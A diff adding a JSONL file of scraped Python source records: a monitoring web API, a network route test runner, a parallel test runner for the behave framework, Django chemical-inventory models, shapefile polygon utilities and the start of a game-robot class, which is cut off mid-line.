diff --git "a/2783.jsonl" "b/2783.jsonl" new file mode 100644--- /dev/null +++ "b/2783.jsonl" @@ -0,0 +1,680 @@ +{"seq_id":"632500814","text":"#coding=utf-8\nfrom products.netPublicModel.modelManager import ModelManager\n\nfrom products.netWebAPI.base import BaseApi, apiAccessSettings\nfrom products.netUtils import jsonUtils\nfrom products.netPublicModel.collectorClient import ColloectorCallClient\nfrom products.netHome.hostHome import HostHome\nfrom products.netPublicModel.userMessage import UserMsg\nfrom products.netModel.org.deviceClass import DeviceClass\nfrom products.netPublicModel.userControl import UserControl\nfrom products.netUtils.mcClient import availabilityCacheDecorator,\\\n getSummaryInfo_DeviceClass\nfrom products.netModel.org.location import Location\nfrom products.netUtils import xutils\nfrom products.netBilling.extendDevice import ExtendDevice\nfrom products.netPublicModel.emailTemplates import extend_device_mail_html\n\n\ndef _countDevComponents(dev, ctype, selectedComponents, user=None):\n \"\"\"\n 统计打算新增的组件数量,及已经存在的数量\n @return: int\n \"\"\"\n if not user: user = UserControl.getUser() \n \n components = getattr(dev, ctype, [])\n existUnames = [cp.uname for cp in components]\n selectedUnames = [cp.get(\"uname\") for cp in selectedComponents]\n newUnames = set(selectedUnames) - set(existUnames)\n return len(newUnames), len(components)\n\nclass MonitorApi(BaseApi):\n \n def _getDev(self, uid):\n dr = ModelManager.getMod(\"dataRoot\")\n dev = dr.findDeviceByUid(uid)\n return dev\n \n def _getMo(self, mtype, uid):\n from products.netModel.device import Device\n from products.netModel.website import Website\n \n mTypes = {\"Device\":Device, 'Website':Website}\n mcls = mTypes.get(mtype)\n return mcls._loadObj(uid)\n \n def searchDevice(self, orgType, orgUid):\n dr = ModelManager.getMod(\"dataRoot\")\n org = dr.loadOrgByUid(orgType, orgUid)\n conditions = {}\n rs = org.getAllMonitorObjs(conditions=conditions)\n def updict(doc):\n return {\"title\": doc.titleOrUid(), \"cpu\": doc.getCpu(), \"mem\": doc.getMem(), \"upTime\": doc.getSysUpTime(), \"status\": doc.getStatus()}\n rs = jsonUtils.jsonDocList(rs, updict=updict)\n return rs\n \n def listDevices(self, orgType, orgUid):\n devs = self.searchDevice(orgType, orgUid)\n #return filter(lambda x: x.get(\"status\") is False, devs)\n return devs\n \n def listDevicesBaseInfo(self, orgType, orgUid, locUid=None):\n dr = ModelManager.getMod(\"dataRoot\")\n org = dr.loadOrgByUid(orgType, orgUid)\n loc = Location._loadObj(locUid) if locUid else Location.getDefault()\n \n conditions = {}\n conditions.update({\"location\": loc._getRefInfo()})\n rs = org.getAllMonitorObjs(conditions=conditions)\n \n igs = [\"templates\", \"description\", \"objThresholds\", \"startUpIPMI\", \"ipmiConfig\", \"ownCompany\",\n \"snmpConfig\", \"lastSentBootpoCmdTime\", \"monitored\", \"commConfig\", \"collector\", \"wmiConfig\", \"deviceCls\"]\n def updict(doc):\n return {\"title\": doc.titleOrUid(), \"cpu\": doc.getCpu(), \"mem\": doc.getMem(), \"upTime\": doc.getSysUpTime(), \"status\": doc.getStatus()}\n rs = jsonUtils.jsonDocList(rs, updict=updict, ignoreProperyties= igs)\n return rs\n \n \n def listDevicesForConfigGrid(self, orgUid=None, locUid=None):\n if not orgUid or not locUid: return []\n \n org = DeviceClass._loadObj(orgUid)\n loc = Location._loadObj(locUid) if locUid else Location.getDefault()\n \n if not org or not loc: return []\n conditions = {}\n conditions.update({\"location\": loc._getRefInfo()})\n \n igs = [\"templates\", \"description\", \"objThresholds\", \"startUpIPMI\", \"ipmiConfig\", \"ownCompany\",\n \"snmpConfig\",\"monitored\", \"commConfig\", \"collector\", \"wmiConfig\", \"deviceCls\"]\n rs = org.getAllMonitorObjs(conditions=conditions)\n def updict(doc):\n return {\"title\": doc.titleOrUid()}\n rs = jsonUtils.jsonDocList(rs, updict=updict, ignoreProperyties= igs)\n return rs\n\n \n def _listDeviceComponents(self, cType, devUid):\n \"\"\"\n 通过发送命令,获取设备组件的配置数据\n @param cType: interface|process|fileSystem\n @return: <[]>\n \"\"\"\n defaultPluginSettings = dict(interface=\"InterfaceMap\", process=\"HRSWRunMap\", fileSystem=\"HRFileSystemMap\")\n \n dr = ModelManager.getMod(\"dataRoot\")\n dev = dr.findDeviceByUid(devUid)\n if not dev: return []\n ccClient = ColloectorCallClient(dev.collector.host)\n data = {\"uid\":dev.getUid(),\"componentType\":dev.getComponentType()}\n \n pluginSettings = dev.getPluginSettings()\n if not pluginSettings: return []\n rs = ccClient.call(pluginSettings.get(cType, defaultPluginSettings.get(cType)), vars = data)\n errMsg=rs.get(\"message\",\"\")\n if errMsg : UserMsg.warn(errMsg)\n for d in rs[\"data\"]:\n try:d[\"uname\"] = d[\"uname\"].decode(\"gb2312\")\n except: pass\n \n return rs[\"data\"]\n \n \n def listDeviceIpInterfaces(self, devUid):\n return self._listDeviceComponents(\"interface\", devUid)\n \n @apiAccessSettings(\"edit\")\n def updateDeviceIpInterfaces(self, devUid, interfaces=[]):\n \"添加或更新接口配置\"\n dev = self._getDev(devUid)\n if not dev: return \"warn:not ok, dev is not exist.\"\n# newCount, existCount = _countDevComponents(dev, \"interfaces\", interfaces)\n# user = UserControl.getUser()\n# lp = user.levelPolicy\n# hasAuth = lp.interfaceCount - newCount - existCount >= 0\n# if not hasAuth:\n# return \"auth_warn:操作失败,无法添加更多的接口\"\n dev.update_save_ipInterfaces(interfaces)\n return \"成功添加或更新接口配置\"\n \n def listDeviceProcesses(self, devUid):\n return self._listDeviceComponents(\"process\", devUid)\n \n @apiAccessSettings(\"edit\")\n def updateDeviceProcesses(self, devUid, processes=[]):\n \"添加或更新进程配置\"\n dev = self._getDev(devUid)\n if not dev: return \"warn:not ok, dev is not exist.\"\n# newCount, existCount = _countDevComponents(dev, \"processes\", processes)\n# user = UserControl.getUser()\n# lp = user.levelPolicy\n# hasAuth = lp.processCount - newCount - existCount >= 0\n# if not hasAuth: \n# return \"auth_warn:操作失败,无法添加更多的进程\" \n dev.update_save_processes(processes)\n return \"成功添加或更新进程配置\"\n \n \n def listDeviceFileSystems(self, devUid):\n return self._listDeviceComponents(\"fileSystem\", devUid)\n\n \n @apiAccessSettings(\"edit\")\n def updateDeviceFileSystems(self, devUid, fileSystems=[]):\n \"添加或更新文件系统配置\"\n dev = self._getDev(devUid)\n# if not dev: return \"warn:not ok, dev is not exist.\"\n# newCount, existCount = _countDevComponents(dev, \"fileSystems\", fileSystems)\n# user = UserControl.getUser()\n# lp = user.levelPolicy\n# hasAuth = lp.fileSystemCount - newCount - existCount >= 0\n# if not hasAuth:\n# return \"auth_warn:操作失败,无法添加更多的文件系统\"\n dev.update_save_fileSystems(fileSystems)\n return \"成功添加或更新文件系统配置\"\n \n @apiAccessSettings(\"edit\")\n def updateDeviceIpServices(self, devUid, ipServices=[]):\n \"添加或更新IP服务配置\"\n dev = self._getDev(devUid)\n# if not dev: return \"warn:not ok, dev is not exist.\"\n# newCount, existCount = _countDevComponents(dev, \"ipServices\", ipServices)\n# user = UserControl.getUser()\n# lp = user.levelPolicy\n# hasAuth = lp.ipServiceCount - newCount - existCount >= 0\n# if not hasAuth:\n# return \"auth_warn:操作失败,无法添加更多的IP服务\"\n dev.update_save_ipServices(ipServices)\n return \"成功添加或更新IP服务配置\"\n \n \n \n def getDeviceClsRecentlyEvents(self, orgType, orgUid):\n dr = ModelManager.getMod(\"dataRoot\")\n org = dr.loadOrgByUid(orgType, orgUid)\n if not org: return []\n conditions = {\"severity\":{\"$gte\":3}}\n evts = org.events(conditions=conditions, limit=10)\n return jsonUtils.jsonDocList(evts)\n \n \n def getDeviceClsRecentlyEventsBaseInfo(self, orgType, orgUid, locUid=None):\n dr = ModelManager.getMod(\"dataRoot\")\n org = dr.loadOrgByUid(orgType, orgUid)\n loc = Location._loadObj(locUid) if locUid else Location.getDefault()\n moConditions={}\n moConditions.update({\"location\": loc._getRefInfo()})\n \n igs = [\"collectPointUid\", \"agent\", \"companyUid\", \"historical\",\"evtKeyId\", \"clearId\",\n \"eventClass\", \"clearKey\", \"eventState\", \"collector\"]\n if not org: return []\n conditions = {\"severity\":{\"$gte\":3}}\n evts = org.events(conditions=conditions, moConditions=moConditions, limit=10)\n return jsonUtils.jsonDocList(evts, ignoreProperyties=igs)\n \n##------------------------------------------top N------------------------------------------------------## \n @availabilityCacheDecorator\n def devicesAvailabilityTopN(self, orgType, orgUid, locUid=None, timeRange=3600):\n dr = ModelManager.getMod(\"dataRoot\")\n org = dr.loadOrgByUid(orgType, orgUid)\n loc = Location._loadObj(locUid) if locUid else Location.getDefault()\n hh = HostHome(org, loc)\n \n rs = hh.getHostAvailabilitysTop(timeRange=timeRange)\n \n series = []\n for key, value in rs[\"rs\"].items():\n series.append(dict(name=key, data=value))\n \n return dict(series=series, categories=rs[\"strTime\"])\n \n @availabilityCacheDecorator\n def interfacesAvailabilityTopN(self, orgType, orgUid, locUid=None, timeRange=3600):\n dr = ModelManager.getMod(\"dataRoot\")\n org = dr.loadOrgByUid(orgType, orgUid)\n loc = Location._loadObj(locUid) if locUid else Location.getDefault()\n hh = HostHome(org, loc)\n \n rs = hh.getNetworkAvailabilitysTop(timeRange=timeRange)\n \n series = []\n for key, value in rs[\"rs\"].items():\n series.append(dict(name=key, data=value))\n \n return dict(series=series, categories=rs[\"strTime\"])\n\n @availabilityCacheDecorator\n def processesAvailabilityTopN(self, orgType, orgUid, locUid=None, timeRange=3600):\n \n dr = ModelManager.getMod(\"dataRoot\")\n org = dr.loadOrgByUid(orgType, orgUid)\n loc = Location._loadObj(locUid) if locUid else Location.getDefault()\n hh = HostHome(org, loc)\n \n rs = hh.getProcessAvailabilitysTop(timeRange=timeRange)\n \n series = []\n for key, value in rs[\"rs\"].items():\n series.append(dict(name=key, data=value))\n \n return dict(series=series, categories=rs[\"strTime\"])\n \n @availabilityCacheDecorator\n def servicesAvailabilityTopN(self, orgType, orgUid, locUid=None, timeRange=3600):\n dr = ModelManager.getMod(\"dataRoot\")\n org = dr.loadOrgByUid(orgType, orgUid)\n loc = Location._loadObj(locUid) if locUid else Location.getDefault()\n hh = HostHome(org, loc)\n \n rs = hh.getServiceAvailabilitysTop(timeRange=timeRange)\n \n series = []\n for key, value in rs[\"rs\"].items():\n series.append(dict(name=key, data=value))\n \n return dict(series=series, categories=rs[\"strTime\"])\n \n \n##--------------------------------------------End Top N--------------------------------------------##\n @getSummaryInfo_DeviceClass\n def getSummaryInfo(self):\n \"综合评分与概要信息\"\n root = DeviceClass.getRoot()\n hh = HostHome(root)\n return hh.getHostSorce()\n \n \n \n\n def getRaidInfos(self, moUid, moType=\"Deive\"):\n raidInfos = dict(serialNo=None, productName=None,memorySize=None,\n vdsOnLineDisk=None,vdsCriticalDisks=None,vdsRebuildDisk=None,\n pdsDisks=None,pdsCriticalDisks=None,pdsFailedDisks=None)\n \n dr = ModelManager.getMod(\"dataRoot\")\n mo = dr.getMonitorObjByTypeAndUid(moUid, moType)\n if not mo: return raidInfos\n \n raidTpl = mo.getTemplate(\"ExtendTpl_SshRaidLinux\")\n if not raidTpl: return raidInfos\n \n raidInfos[\"serialNo\"] = mo.getStatusValue(raidTpl.getUid(), \"raid\", \"serialNo\")\n raidInfos[\"productName\"] = mo.getStatusValue(raidTpl.getUid(), \"raid\", \"productName\")\n raidInfos[\"memorySize\"] = mo.getStatusValue(raidTpl.getUid(), \"raid\", \"memorySize\")\n \n dptNames = [\"vdsOnLineDisk\", \"vdsCriticalDisks\", \"vdsRebuildDisk\", \"pdsDisks\", \"pdsCriticalDisks\", \"pdsFailedDisks\"]\n for name in dptNames:\n raidInfos[name] = mo.getPerfValue(raidTpl.getUid(), \"raid\", name)\n \n return raidInfos\n \n \n def getTempAndFanInfos(self, moUid, moType=\"Deive\"):\n raidInfos = dict(ambientTemp=None, okFan=None,failFan=None)\n \n dr = ModelManager.getMod(\"dataRoot\")\n mo = dr.getMonitorObjByTypeAndUid(moUid, moType)\n if not mo: return raidInfos\n \n raidTpl = mo.getTemplate(\"ExtendTpl_IpmiLinux\")\n if not raidTpl: return raidInfos\n\n \n dptNames = [\"ambientTemp\", \"okFan\", \"failFan\"]\n for name in dptNames:\n raidInfos[name] = mo.getPerfValue(raidTpl.getUid(), \"ipmiTempAndFan\", name)\n \n return raidInfos\n \n\n\n def hasExtendTpl(self, moUid, tplName, moType=\"Deive\"):\n dr = ModelManager.getMod(\"dataRoot\")\n mo = dr.getMonitorObjByTypeAndUid(moUid, moType)\n if not mo:return False\n \n tpl = mo.getTemplate(tplName)\n if not tpl: return False\n \n return True\n \n\n def extendDevice(self,host,website,network):\n user=UserControl.getUser()\n if not user:return \"warn:请先登录\"\n if not xutils.isValiedNum(host):return \"warn:主机数目只能为非负数,且不能以0开头\"\n if not xutils.isValiedNum(website):return \"warn:站点数目只能为非负数,且不能以0开头\"\n if not xutils.isValiedNum(network):return \"warn:网络数目只能为非负数,且不能以0开头\"\n host=int(host)\n website=int(website)\n network=int(network)\n money_host=xutils.countMoney(host,5.0,xutils.setDiscount(host))\n money_website=xutils.countMoney(website, 5.0,xutils.setDiscount(website))\n money_network=xutils.countMoney(network, 5.0,xutils.setDiscount(network))\n money=money_host+money_website+money_network\n if int(money)==0:return \"请至少选择一种需要扩充的设备类型\"\n\n extendDevice=ExtendDevice()\n extendDevice.user=user\n extendDevice.deviceCount=host\n extendDevice.websiteCount=website\n extendDevice.networkCount=network\n extendDevice.money=money\n extendDevice._saveObj()\n try:\n self.extendDeviceMail(extendDevice, \"网脊用户\")\n except:\n return \"您的请求已提交,虽然未能正确发送邮件,但是稍后我们会主动联系您,多谢您的支持\"\n return \"您的请求已提交,稍后我们会主动联系您,多谢您的支持\"\n \n \n def extendDeviceMail(self,ed,st):\n subject = st + \"设备扩充通知\"\n message = extend_device_mail_html %{\n \"deviceCount\":ed.deviceCount,\n \"websiteCount\":ed.websiteCount,\n \"networkCount\":ed.networkCount,\n \"user\":ed.user.username,\n \"email\":ed.user.email,\n \"contactPhone\":ed.user.contactPhone,\n \"originalName\":ed.user.originalName,\n \"money\":ed.money\n }\n xutils.sendMail(subject, message, recipient_list=[ed.user.username], attachments=[]) \n","sub_path":"products/netWebAPI/monitorApi.py","file_name":"monitorApi.py","file_ext":"py","file_size_in_byte":16177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"459381313","text":"#!/usr/bin/env python3.7\n# -*- coding: utf-8 -*-\n\n# #############################################################################\n#\n# Import Library\n#\nfrom nornir.core import Nornir\nfrom functions.static.static_get import get_static\nfrom functions.static.static_compare import compare_static\nfrom const.constants import (\n TEST_TO_EXECUTE_FILENAME,\n PATH_TO_VERITY_FILES,\n STATIC_SRC_FILENAME,\n TEST_TO_EXC_STATIC_KEY,\n)\n\n# #############################################################################\n#\n# Constantes\n#\nERROR_HEADER = \"Error import [static_run.py]\"\nHEADER = \"[static_run.py]\"\n\n\n# #############################################################################\n#\n# Functions\n#\ndef run_static(nr: Nornir, test_to_execute: dict) -> bool:\n exit_value = True\n if TEST_TO_EXC_STATIC_KEY in test_to_execute.keys():\n if test_to_execute.get(TEST_TO_EXC_STATIC_KEY).get(\"test\", False):\n get_static(nr)\n same = compare_static(\n nr=nr,\n ansible_vars=test_to_execute.get(TEST_TO_EXC_STATIC_KEY)\n .get(\"ansible_vars\")\n .get(\"enable\", False),\n dict_keys=test_to_execute.get(TEST_TO_EXC_STATIC_KEY)\n .get(\"ansible_vars\")\n .get(\"dict_keys\", False),\n your_keys=test_to_execute.get(TEST_TO_EXC_STATIC_KEY)\n .get(\"ansible_vars\")\n .get(\"your_keys\", False),\n )\n if (\n test_to_execute.get(TEST_TO_EXC_STATIC_KEY).get(\"test\", False)\n and same is False\n ):\n exit_value = False\n print(\n f\"{HEADER} Static routes defined in\"\n f\"{PATH_TO_VERITY_FILES}{STATIC_SRC_FILENAME} work = {same} !!\"\n )\n else:\n print(f\"{HEADER} Static routes have not been executed !!\")\n else:\n print(\n f\"{HEADER} Static routes key is not defined in\"\n f\"{PATH_TO_VERITY_FILES}{TEST_TO_EXECUTE_FILENAME} !!\"\n )\n\n return exit_value\n","sub_path":"functions/static/static_run.py","file_name":"static_run.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"92361703","text":"# -*- coding: UTF-8 -*-\n\"\"\"\nThis module provides multiprocessing Runner class.\n\"\"\"\n\nimport six\nimport os\nimport multiprocessing\n\nfrom behave.formatter._registry import make_formatters\nfrom behave.runner import Runner, Context\nfrom behave.model import Feature, Scenario, ScenarioOutline, NoMatch\nfrom behave.runner_util import parse_features, load_step_modules\nfrom behave.step_registry import registry as the_step_registry\n\nif six.PY2:\n import Queue as queue\nelse:\n import queue\n\n\nclass MultiProcRunner(Runner):\n \"\"\"Master multiprocessing runner: scans jobs and distributes to slaves\n\n This runner should not do any \"processing\" tasks, apart from scanning\n the feature files and their scenarios. It then spawns processing nodes\n and lets them consume the queue of tasks scheduled.\n \"\"\"\n def __init__(self, config):\n super(MultiProcRunner, self).__init__(config)\n self.jobs_map = {}\n self.jobsq = multiprocessing.JoinableQueue()\n self.resultsq = multiprocessing.Queue()\n self._reported_features = set()\n self.results_fail = False\n\n def run_with_paths(self):\n feature_locations = [filename for filename in self.feature_locations()\n if not self.config.exclude(filename)]\n self.load_hooks() # hooks themselves not used, but 'environment.py' loaded\n # step definitions are needed here for formatters only\n self.load_step_definitions()\n features = parse_features(feature_locations, language=self.config.lang)\n self.features.extend(features)\n feature_count, scenario_count = self.scan_features()\n njobs = len(self.jobs_map)\n proc_count = int(self.config.proc_count)\n print (\"INFO: {0} scenario(s) and {1} feature(s) queued for\"\n \" consideration by {2} workers. Some may be skipped if the\"\n \" -t option was given...\"\n .format(scenario_count, feature_count, proc_count))\n\n procs = []\n old_outs = self.config.outputs\n self.config.outputs = []\n old_reporters = self.config.reporters\n self.config.reporters = []\n\n for i in range(proc_count):\n client = MultiProcClientRunner(self, i)\n p = multiprocessing.Process(target=client.run)\n procs.append(p)\n p.start()\n del p\n\n print (\"INFO: started {0} workers for {1} jobs.\".format(proc_count, njobs))\n\n self.config.reporters = old_reporters\n self.formatters = make_formatters(self.config, old_outs)\n self.config.outputs = old_outs\n while (not self.jobsq.empty()):\n # 1: consume while tests are running\n self.consume_results()\n if not any([p.is_alive() for p in procs]):\n break\n\n if any([p.is_alive() for p in procs]):\n self.jobsq.join() # wait for all jobs to be processed\n print (\"INFO: all jobs have been processed\")\n\n while self.consume_results(timeout=0.1):\n # 2: remaining results\n pass\n\n # then, wait for all workers to exit:\n [p.join() for p in procs]\n\n print (\"INFO: all sub-processes have returned\")\n\n while self.consume_results(timeout=0.1):\n # 3: just in case some arrive late in the pipe\n pass\n\n for f in self.features:\n # make sure all features (including ones that have not returned)\n # are printed\n self._output_feature(f)\n\n for formatter in self.formatters:\n formatter.close()\n for reporter in self.config.reporters:\n reporter.end()\n\n return self.results_fail\n\n def scan_features(self):\n raise NotImplementedError\n\n def consume_results(self, timeout=1):\n try:\n job_id, result = self.resultsq.get(timeout=timeout)\n except queue.Empty:\n return False\n\n if job_id is None and result == 'set_fail':\n self.results_fail = True\n return True\n\n item = self.jobs_map.get(job_id)\n if item is None:\n print(\"ERROR: job_id=%x not found in master map\" % job_id)\n return True\n\n try:\n item.recv_status(result)\n if isinstance(item, Feature):\n self._output_feature(item)\n elif isinstance(item, Scenario):\n feature = item.feature\n if feature.is_finished:\n self._output_feature(feature)\n else:\n print(\"INFO: scenario finished: %x\" % (job_id,))\n except Exception as e:\n print(\"ERROR: cannot receive status for %r: %s\" % (item, e))\n if self.config.wip and not self.config.quiet:\n import traceback\n traceback.print_exc()\n return True\n\n def _output_feature(self, feature):\n if id(feature) in self._reported_features:\n return\n self._reported_features.add(id(feature))\n\n for formatter in self.formatters:\n formatter.uri(feature.filename)\n formatter.feature(feature)\n if feature.background:\n formatter.background(feature.background)\n for scenario in feature.scenarios:\n formatter.scenario(scenario)\n for step in scenario.steps:\n formatter.step(step)\n for step in scenario.steps:\n match = the_step_registry.find_match(step)\n if match:\n formatter.match(match)\n else:\n formatter.match(NoMatch())\n formatter.result(step)\n\n formatter.eof()\n\n for reporter in self.config.reporters:\n reporter.feature(feature)\n\n\nclass MultiProcRunner_Feature(MultiProcRunner):\n def scan_features(self):\n for feature in self.features:\n self.jobs_map[id(feature)] = feature\n self.jobsq.put(id(feature))\n for scen in feature.scenarios:\n scen.background_steps\n if isinstance(scen, ScenarioOutline):\n # compute the sub-scenarios before serializing\n for subscen in scen.scenarios:\n subscen.background_steps\n\n return len(self.jobs_map), 0\n\n\nclass MultiProcRunner_Scenario(MultiProcRunner):\n def scan_features(self):\n nfeat = nscens = 0\n def put(sth):\n idf = id(sth)\n self.jobs_map[idf] = sth\n self.jobsq.put(idf)\n\n for feature in self.features:\n if 'serial' in feature.tags:\n put(feature)\n nfeat += 1\n for scen in feature.scenarios:\n scen.background_steps\n if isinstance(scen, ScenarioOutline):\n # compute the sub-scenarios before serializing\n for subscen in scen.scenarios:\n subscen.background_steps\n continue\n for scenario in feature.scenarios:\n scenario.background_steps # compute them, before sending out\n if scenario.type == 'scenario':\n put(scenario)\n nscens += 1\n else:\n for subscenario in scenario.scenarios:\n subscenario.background_steps\n put(subscenario)\n nscens += 1\n\n return nfeat, nscens\n\n\nclass MultiProcClientRunner(Runner):\n \"\"\"Multiprocessing Client runner: picks \"jobs\" from parent queue\n\n Each client is tagged with a `num` to appear in outputs etc.\n \"\"\"\n def __init__(self, parent, num):\n super(MultiProcClientRunner, self).__init__(parent.config)\n self.num = num\n self.jobs_map = parent.jobs_map\n self.jobsq = parent.jobsq\n self.resultsq = parent.resultsq\n\n def iter_queue(self):\n \"\"\"Iterator fetching features from the queue\n\n Note that this iterator is lazy and multiprocess-affected:\n it cannot know its set of features in advance, will dynamically\n yield ones as found in the queue\n \"\"\"\n while True:\n try:\n job_id = self.jobsq.get(timeout=0.5)\n except queue.Empty:\n break\n\n job = self.jobs_map.get(job_id, None)\n if job is None:\n print(\"ERROR: missing job id=%s from map\" % job_id)\n self.jobsq.task_done()\n continue\n\n if isinstance(job, Feature):\n yield job\n try:\n self.resultsq.put((job_id, job.send_status()))\n except Exception as e:\n print(\"ERROR: cannot send result: {0}\".format(e))\n elif isinstance(job, Scenario):\n # construct a dummy feature, having only this scenario\n kwargs = {}\n for k in ('filename', 'line', 'keyword', 'name', 'tags',\n 'description', 'background', 'language'):\n kwargs[k] = getattr(job.feature, k)\n kwargs['scenarios'] = [job]\n orig_parser = job.feature.parser\n feature = Feature(**kwargs)\n feature.parser = orig_parser\n yield feature\n try:\n self.resultsq.put((job_id, job.send_status()))\n except Exception as e:\n print(\"ERROR: cannot send result: {0}\".format(e))\n else:\n raise TypeError(\"Don't know how to process: %s\" % type(job))\n self.jobsq.task_done()\n\n def run_with_paths(self):\n self.context = Context(self)\n self.load_hooks()\n self.load_step_definitions()\n assert not self.aborted\n\n failed = self.run_model(features=self.iter_queue())\n if failed:\n self.resultsq.put((None, 'set_fail'))\n self.resultsq.close()\n\n\n# eof\n","sub_path":"behave/runner_mp.py","file_name":"runner_mp.py","file_ext":"py","file_size_in_byte":10140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"634602621","text":"from django.db import models\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom django.utils.text import slugify\n# Create your models here.\n\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\nclass Chemical(models.Model):\n name = models.CharField(max_length=256)\n atomic_weight = models.DecimalField(max_digits=10,decimal_places=3)\n cas_number = models.CharField(max_length=25,unique=True)\n slug = models.SlugField(allow_unicode=True,unique=True)\n\n def __str__(self):\n return self.name\n\n def save(self,*args,**kwargs):\n self.slug = slugify(self.name)\n super().save(*args,**kwargs)\n\n def get_absolute_url(self):\n return reverse('inventory:chemicaldet',args=[self.slug])\n\n class Meta:\n ordering = ['name']\n unique_together = ('name','atomic_weight')\n\nclass Bottle(models.Model):\n chemical = models.ForeignKey(Chemical,on_delete=models.CASCADE)\n company = models.CharField(max_length=256)\n catalog_number = models.CharField(max_length=256)\n base_volume = models.DecimalField(default=0.0,max_digits=10,decimal_places=3)\n lot_number = models.CharField(max_length=256)\n price = models.DecimalField(max_digits=10,decimal_places=2)\n current_volume = models.DecimalField(default=0.0, max_digits=10,decimal_places=3)\n expiration = models.DateField(null=True,blank=True)\n recieved = models.DateField()\n recieved_by = models.ForeignKey(User,related_name='recieved_by_user',on_delete=models.CASCADE)\n date_opened = models.DateTimeField(null=True,blank=True)\n opened_by = models.ForeignKey(User,related_name='opened_by_user',blank=True,null=True, on_delete=models.CASCADE)\n date_discarded = models.DateTimeField(null=True,blank=True)\n discarded_by = models.ForeignKey(User,related_name='discarded_by_user',blank=True, null=True,on_delete=models.CASCADE)\n\n def __str__(self):\n if self.date_opened == None:\n is_opened = ['False']\n else:\n is_opened = str(self.date_opened).split()\n return self.chemical.name + \" (opened: \" + is_opened[0] + \") \" + str(self.id)\n\n def get_absolute_url(self):\n return reverse('inventory:inventoryhome')\n\n\n class Meta:\n ordering = ['chemical']\n\n\nclass Additive(models.Model):\n bottle = models.ForeignKey(Bottle,on_delete=models.CASCADE)\n concentration = models.DecimalField(max_digits=10,decimal_places=3)\n date_made = models.DateTimeField()\n made_by = models.ForeignKey(User,on_delete=models.CASCADE)\n batchid = models.CharField(max_length=256)\n filtered = models.BooleanField()\n volume = models.DecimalField(default=0.0,max_digits=10,decimal_places=3)\n # date_discarded = models.DateTimeField(null=True,blank=True)\n # discarded_by = models.ForeignKey(User,related_name='additive_discarded_by',blank=True, null=True,on_delete=models.CASCADE)\n\n def __str__(self):\n if str(self.concentration).split(\".\")[1] == '000':\n stringConcentration = str(self.concentration).split(\".\")[0]\n else:\n stringConcentration = str(self.concentration)\n stringVersion = self.bottle.chemical.name + \" (\" + stringConcentration + \" mg/ml)\"\n return stringVersion\n\n def get_absolute_url(self):\n return reverse('inventory:inventoryhome')\n\n class Meta:\n ordering = ['bottle','concentration']\n","sub_path":"inventory/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"390970403","text":"\"\"\"\nFunctions for converting an input shapefile into a list of\nshapely.MultiPolygom.geoms objects.\n\"\"\"\n\nfrom shapely.geometry import shape, MultiPolygon\nfrom itertools import chain\nimport shapefile\n\n\ndef shpToGeoJSON(shp_path):\n \"\"\" Convert .shp file to GeoJSON format.\n\n @param shp_path str: path to .shp file\n @return list of dicts:\n {'ID': Unique identifier for bounding polygon,\n 'geom': shapely.MultiPolygon}\n \"\"\"\n # Read shapefile\n sf = shapefile.Reader(shp_path)\n # Find index of 'ID' field\n field_names = [field[0] for field in sf.fields[1:]]\n ID_index = field_names.index('ID')\n # Load records\n rec = sf.records()\n\n # Create list of dicts\n GeoJSON_sf = []\n for index, sr in enumerate(sf.shapeRecords()):\n GeoJSON_sf.append({'ID': rec[index][ID_index],\n 'geom': MultiPolygon([shape(sr.\n shape.__geo_interface__)])})\n return GeoJSON_sf\n\n\ndef _gen_polys(row):\n \"\"\"\n Takes an admin wkt row and yields polygons with gubid set.\n\n It splits multipolygons into constituent polygons with the same GUBID,\n but assigns them each a unique uid.\n\n @param row dict: {'geom': MultiPolygon, 'GUBID': uid}\n @yield Polygon with GUBID attribute set.\n \"\"\"\n multipoly = row['geom']\n for i, poly in enumerate(multipoly.geoms):\n setattr(poly, 'gubid', row['ID'])\n setattr(poly, 'uid', '{}_{}'.format(row['ID'], i))\n yield poly\n\n\ndef geoJSON_to_polys(geoJSON_list):\n \"\"\"\n Converts geoJSON list to a list of shapely Polygon objects.\n\n These polygons are the consituent polygons for the admin regions, each with\n the GUBID of the admin region, and an id unique to the polygon.\n\n @param admin_data [{}]: List of {'ID': str,\n 'geom': shapely.geometry.polygon}.\n @return [Polygon]: Polygons with gubid and uid attributes.\n \"\"\"\n # collect the iterable into a list\n polys = list(\n # chain.from_iterable \"flattens\" the iterable of iterables of Polygons\n # to just an iterable of Polygons\n chain.from_iterable(\n # _gen_polys produces an iterable of Polygons, so this will be an\n # iterable of iterables of Polygons.\n map(_gen_polys, geoJSON_list)\n ))\n return polys\n\n\ndef shp_to_polys(shp_path):\n \"\"\" Convert .shp to list of shapely Polygon objects.\"\"\"\n geoJSON_list = shpToGeoJSON(shp_path)\n return geoJSON_to_polys(geoJSON_list)\n","sub_path":"utils/polycreation.py","file_name":"polycreation.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"328109529","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nfrom okc_robot.data import UserData\nfrom okc_robot.protocol import Protocol\nfrom okc_robot.data import game_table\nfrom okc_robot.net import Response\nfrom config import conf_path\n\nimport logging\nimport random\n\n\nclass User(object):\n\t\n\tdef __init__(self, user_data: UserData, protocol: Protocol):\n\t\tself.__data = user_data\n\t\tself.__sid = self.__data.svr_player.sid\n\t\tself.__uid = self.__data.svr_player.uid\n\t\tself.__ksid = self.__data.svr_player.ksid\n\t\tself.__request = protocol\n\t\n\tdef player_name_change(self, name=\"\") -> Response:\n\t\tif name == \"\":\n\t\t\tname = str(self.__uid)\n\t\telse:\n\t\t\tname = \"%s%s\" % (self.__uid, name)\n\t\t\n\t\titem_id = 6\n\t\tif str(item_id) in self.__data.svr_bag.item_list.keys():\n\t\t\tgem = 0\n\t\telse:\n\t\t\tgem = game_table.get_item(item_id=item_id).item_price\n\t\thave_gem = self.__data.svr_login.gem\n\t\tif have_gem < 